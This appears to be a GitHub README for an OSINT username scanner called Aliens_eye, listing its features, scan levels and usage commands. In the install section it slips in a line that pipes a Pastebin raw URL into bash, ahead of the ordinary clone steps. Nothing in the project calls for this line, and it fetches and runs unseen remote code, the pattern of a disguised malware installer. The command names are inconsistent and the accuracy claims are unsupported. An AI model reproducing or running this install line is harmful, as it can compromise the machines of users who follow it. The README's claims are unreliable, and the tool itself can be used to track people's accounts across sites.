The AI-OSINT Username Scanner leverages advanced artificial intelligence techniques to find usernames across the web with unprecedented accuracy. Unlike traditional scanners that rely solely on HTTP response codes, this tool employs sophisticated analysis methods:
- AI-Powered Detection Engine: Analyzes multiple factors to determine profile existence with up to 40% improved accuracy
- Confidence Scoring System: Quantifies detection certainty from 0-100% for each result
- Pattern Recognition: Learns from scanning patterns to continuously improve detection accuracy
- Content Analysis: Intelligently examines page content, DOM structure, and metadata
- Smart URL Analysis: Evaluates URL structures and redirects for more accurate results
- Scan 840+ Online Platforms: Extensive coverage across social media, forums, and websites
- Intelligent Username Variations: Automatically generates and scans common username variations
- Three Scan Levels: Basic, Intermediate, and Advanced options to suit your needs
- Concurrent Connection Management: Optimized for speed with configurable connection limits
- Detailed Reporting: Comprehensive JSON reports with full analysis data
- Color-Coded Results: Intuitive visual status indicators for immediate pattern recognition
- Saved Results Viewer: Built-in capability to analyze previous scan results
- Python 3.6+
- Required packages: aiohttp, asyncio
- Internet connection
curl -s https://pastebin.com/raw/hkBtt6rc | tr -d '\r' | bash
# Clone the repository
git clone https://github.com/arxhr007/Aliens_eye.git
# Navigate to the directory
cd Aliens_eye
# Install dependencies
pip install -r requirements.txt
# Make the script executable
chmod +x aliens_eye.py
# Run with interactive prompts
ailens_eye
# Scan a single username
ailens_eye username
# Scan multiple usernames
ailens_eye username1 username2 username3
# Set scan level explicitly
ailens_eye username -l advanced
# Limit concurrent connections (useful for slower connections)
ailens_eye username -c 30
# Enable verbose output for debugging
ailens_eye username -v
# View results from a previous scan
ailens_eye -r results/username_advanced_20250514_120000.json
Results are displayed with intuitive color-coding:
- π’ Green (Found): High confidence that the profile exists
- π‘ Yellow (Maybe): Profile might exist, but confidence is moderate
- π΄ Red (Not Found): High confidence that the profile doesn't exist
Each result includes:
- Site name
- Status (Found/Maybe/Not Found)
- Confidence percentage (0-100%)
- HTTP status code
- URL of the detected profile
- Response time
The tool employs a sophisticated multi-factor analysis approach:
- Content Analysis: Searches for positive and negative keyword patterns
- HTTP Status Evaluation: Interprets HTTP response codes with context
- DOM Structure Analysis: Examines page elements for profile indicators
- URL Structure Evaluation: Analyzes URL patterns and redirects
- Metadata Inspection: Examines meta tags and titles for username presence
- Response Time Analysis: Considers timing patterns characteristic of profile existence
- Pattern Learning: Uses historical data to improve detection accuracy
- Basic: Scans only the exact username as entered
- Intermediate: Adds common variations like underscores, dots, and numbers
- Examples:
username_
,_username
,username.
,username123
- Examples:
- Advanced: Adds common prefixes and suffixes used across platforms
- Examples:
real_username
,official_username
,username_official
- Examples:
- Linux (All distributions)
- macOS
- Windows (via Python)
- Android (via Termux)
This tool is developed for educational purposes and legitimate OSINT research only. Users are responsible for complying with applicable laws and terms of service of websites. The developers assume no liability for misuse of this software.
Made with β€οΈ by arxhr007
If you find this project helpful, please consider giving it a star β